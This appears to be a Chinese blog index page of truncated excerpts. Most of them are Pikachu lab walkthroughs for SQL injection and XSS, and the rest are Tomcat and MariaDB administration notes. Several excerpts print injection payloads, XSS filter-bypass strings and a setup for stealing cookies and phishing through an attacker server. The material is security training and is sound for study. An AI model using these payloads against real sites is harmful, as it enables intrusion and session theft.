SQL注入-基于delete利用案例 在delete界面点击删除,同时使用bp工具进行抓包查看数据 通过抓包查看,id=65为数字型的 将该数据发送到repeater进行编辑输入payload语句进行测试 1 or updatemxl(1,concat(0x7e,database()),0) 将payload语句输入到id=后面,然后选中payload语句进行格式转换 然后点击发送,可以查
SQL注入-基于insert/update利用案例 sql语句正常插入表中的数据 insert into member(username,pw,sex,phonenum,address,email) values('xiaoqiang',1111,1,2,3,4); select * from member; 例如插入小强数据,如图所示: 采用or这个运算符,构造闭合语句 values('xi
注入基于函数报错extractvalue(),floor()-字符型 基于extractvalue() 爆出数据库版本payload语句: kobe' and extractvalue(0,concat(0x7e,version()))# 爆出数据库版本 基于floor() floor()函数就是取整数 爆出数据版本信息 kobe' and (select 2 from (select c
基于函数报错的方式来进行利用-字符型(本页updatexml()) 前提条件是后台数据库没有屏蔽数据库语法报错信息 updatexml()方法详解 注释: 第一个参数,意思就是xml文档的名称 第二个参数,意思就是定位到xml文档中指定的某一个位置的更新 第三个参数,意思就是将文档中指定某一个位置的内容进行替换 基于函数报错的payload语句:updatexml() kobe' and up
通过information_schema拿下数据库案例-字符型 数据库information_schema数据库中存在很多重要信息,包括所有的表名,库名,列名等等 TABLES表名的对应字段信息 COLUMNS对应的字段信息 测试开始,还是用字符型为案例 我进行随意输入一个单引号,进行查询,返回报错sql语句错误等,证明输入的信息被后台执行了 随意输入一个payload语句,发现爆出两个字
通过union进行获取数据-字符型 在pikachu上查询kobe,出现了两个字段id和email 在后台和前端查询是一样的出现数据,也就是有两个字段:id和email 通过sql语句order by 以列的形式排序,没有第三列,所以order by 3 报错 然后在字符型手动测试猜测有几列,可以多次测试看看有多少列。 aaa' order by 3# 如图所示表中没有3列 再来输入一次
SQL注入-xx型 输入kobe查询,同样展示id和邮箱 xx型的sql语句查询方式,猜测 select 字段1,字段2 from 表名 where username=('kobe') 在后台语句中的查询 select id,email from member where username=('kobe'); 根据上图构造payload语句为 username=('kobe') or 1=
SQL注入-搜索型 输入k字段进行搜索发现出用户信息 通过上图搜索可以猜测的sql语句为 select 字段1,字段2 from 表名 where username like '%k%'; 在后台查询结果 select id,email from member where username like '%k%'; 通过以上猜测进行构造payload语句 like '%k%' or 1=1
SQL注入-字符型(get) 输入kobe查询出现id和邮箱 猜测语句,字符在数据库中需要用到单引号或者双引号 select 字段1,字段2 from 表名 where username='kobe'; 在数据库中查询对应的kobe,根据上图对应上。 select id,email from member where username='kobe'; 编写payload语句,添加or 1=
SQL注入-数字型(post) 查询1的时候发现url后面的链接没有传入1的参数。验证为post请求方式,仅显示用户和邮箱 通过图中的显示的字段,我们可以猜测传入数据库里面的语句,例如: select 字段1,字段2 from 表名 where id=1; 编辑一个payload的or 1=1 select 用户名,邮箱 from 表名 where id=1 or 1=1; 然后我们进入pik
1.pikachu界面上的csrf(get)登录 账号:lucy密码:123456 2.修改地址,并且都是bp进行抓包 3.bp上抓包的数据信息 抓包的对应的地址是beijing GET /pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=girl&phonenum=12345678922&add=beijing&email
'"><sCrIpT>alert(63252)</sCrIpT> 大小写绕过 '"><IFRAME SRC=javascript:alert('XSXSSSs')></IFRAME> <scr<script>ipt>alert("XXSSSS")</scr</
XSS跨站脚本攻击 一、什么是 XSS XSS全称(Cross Site Scripting)跨站脚本攻击,是最常见的Web应用程序安全漏洞之一,位于OWASP top 10 2013/2017年度分别为第三名和第七名,**XSS是指攻击者在网页中嵌入客户端脚本,通常是JavaScript编写的危险代码,当用户使用浏览器浏览网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的。** 从
12.xss之js输出 后台源码文件 输出的源码 输入1111之后能看到心中所爱 查看页面代码元素,1111在js中,如图所示: 接下来将这段代码复制出来进行编辑攻击代码 <script> $ms='x'</script><script>alert("Xss")</script>'; if($ms.leng
11.xss之href输出 后台配置文件中的代码 xss之href输出绕过:javascript:alert(1111) 直接代入a标签herf里面一样可以绕过htmlspecialchars 输入攻击代码 javascript:alert(1111) 点击蓝色字体直接会弹窗,如图所示:
XSS绕过之htmlspecialchars()函数 首先可以测试一下是否将字符被转移成html实体,输入字符测试 1111'"<>$ 点击提交 查看页面元素代码,发现单引号不变,可以利用 重新输入攻击代码,用单引号闭合前面的,进行提交 q' onclick='alert(111)' 点击蓝色字体直接弹出111
XSS之过滤 通过输入代码发现被过滤掉了 <script>";"666 查看页面元素代码,被后台代码过滤了 尝试一下大小写混合使用,攻击代码如下: <sCRipT>alert('你打篮球像oldqu')</sCrIPt> 如下图所示,大小写混合被弹窗,被执行了。 尝试二方法图片的格式进行攻击弹窗,攻击代码如下: <img sr
XSS盲打 XSS盲打就是攻击者在前端提交的数据不知道后台是否存在xss漏洞的情况下,提交恶意JS代码在类似留言板等输入框后,所展现的后台位置的情况下,网站采用了攻击者插入的恶意代码,当后台管理员在操作时就会触发插入的恶意代码,从而达到攻击者的目的。 管理员后台: http://http://192.168.0.101/pikachu/vul/xss/xssblind/admin_login.
什么是跨域 http:// www . xyz.com : 8080 / script/test.js 协议 子域名 主域名 端口 资源地址 当协议、主机(主域名,子域名)、端口中的任意一个不相同时,称为不同域 我们把不同的域之间请求数据的操作,成为跨域操作。 跨域-同源策略 而为了安全考虑,所有的浏览器都约定了“同源策略”,同源策略规定,两个不同域名之间不能使用JS进行相互操作。比如:x.com
xss钓鱼演示 钓鱼攻击利用页面 D:\phpStudy\WWW\pikachu\pkxss\xfish 修改配置文件里面对应自己的入侵者的IP地址或者域名,对应的路径下的fish.php脚本如下: <?php error_reporting(0); // var_dump($_SERVER); if ((!isset($_SERVER['PHP_AUTH_USER'])) || (!i
原理: 文件路径:\pikachu\pkxss\xcookie\post.html 将post.html文件,复制到皮卡丘的根路径下或者根下随意路径即可,并编辑文件 需要修改以下两个地址,第一个地址是将原界面的样子链接过来,让用户认为是原界面,第二个是将cookie从数据库中提取出来的程序(注意和自己的目录相对应) 基于域名配置文件 基于IP地址配置文件 <html> <he
GET反射型XSS利用:获取cookie 修改一下配置文件\pikachu\pkxss\xcookie\cookie.php 我这里将对应的IP地址修改为本地pikachu的主站IP地址,这样给用户造成一种正常视觉上的欺骗,容易上当。重定向到pikachu主页面 基于IP搭建的pkxss平台(入侵者的IP地址) <script>document.location = 'http:/
DOM XSS(基础) 不与后台服务器产生数据交互,通过前端的dom节点形成的XSS漏洞。 进行测试一下,输入111,会显示what do you see 查看元素代码,看到What do you see 根据前端页面语句进行编写弹窗攻击代码 <a href='"+str+"'>what do you see?</a> "+str+&quo
储存型XSS 或持久型 XSS 交互的数据会被存在在数据库里面,永久性存储,具有很强的稳定性。 在留言板里面进行测试一下是否有做过滤 '"<>?&66666 点击提交 查看元素代码,已经提交完成,并且没有做任何的过滤措施 接下来写一个javascript脚本攻击代码 <script>alert('xss')</script> 弹窗一个x
反射型XSS或不持久型XSS 含义:交互的数据一般不会被存在在数据库里面,只是简单的把用户输入的数据反射给浏览器,一次性,所见即所得。 进行测试一下页面是否存在xss漏洞,进行测试一下 '"<>6666 输入一些字符或者符号,进行测试 查看元素代码,被输入到前端p标签里面 进行输入一个弹窗攻击代码 <script>alert('xss')</scrip
1 前言 随着公司内部使用 Tomcat 作为 web 应用服务器的规模越来越大,为保证 Tomcat 的配置安全,防止信息泄露,恶性攻击以及配置的安全规范,特制定此 Tomcat 安全配置规范。 定位:仅对 tomcat 的安全配置部分进行标准规范。 适用版本范围:tomcat 6.* 2 Tomcat 安装规范 注:所有线上运行 tomcat 必须严格安装本标准执行。 2.1 tomcat
简单命令 现成脚本 通过zabbix进行监控 自定义监控(jmap-heap pid 自定义监控) 通过jmx jps java ps -lvm [root@web01 ~]# jps -lvm 11808 org.apache.catalina.startup.Bootstrap start -Djava.util.logging.config.file=/applica
在加两个tomcat实例 [root@web01 ~]# ll apache-tomcat-8.0.27.tar.gz -rw-r--r-- 1 root root 9128610 10月 5 2015 apache-tomcat-8.0.27.tar.gz [root@web01 ~]# tar xf apache-tomcat-8.0.27.tar.gz [root@web01 ~]#
主配置文件server.xml #shutdown 端口 连接到这个端口 并 输入后面的 暗号 把tomcat关闭 22 <Server port="8005" shutdown="SHUTDOWN"> #tomcat管理端 37 <GlobalNamingResources> 38 <!-- Editabl
安装mariadb数据 yum -y install mariadb-server #启动并设置开启自启动 systemctl start mariadb.service systemctl enable mariadb.service 数据库准备 [root@web01 ~]# mysql Welcome to the MariaDB monitor. Commands en
Copyright © 2005-2025 51CTO.COM 版权所有 京ICP证060544号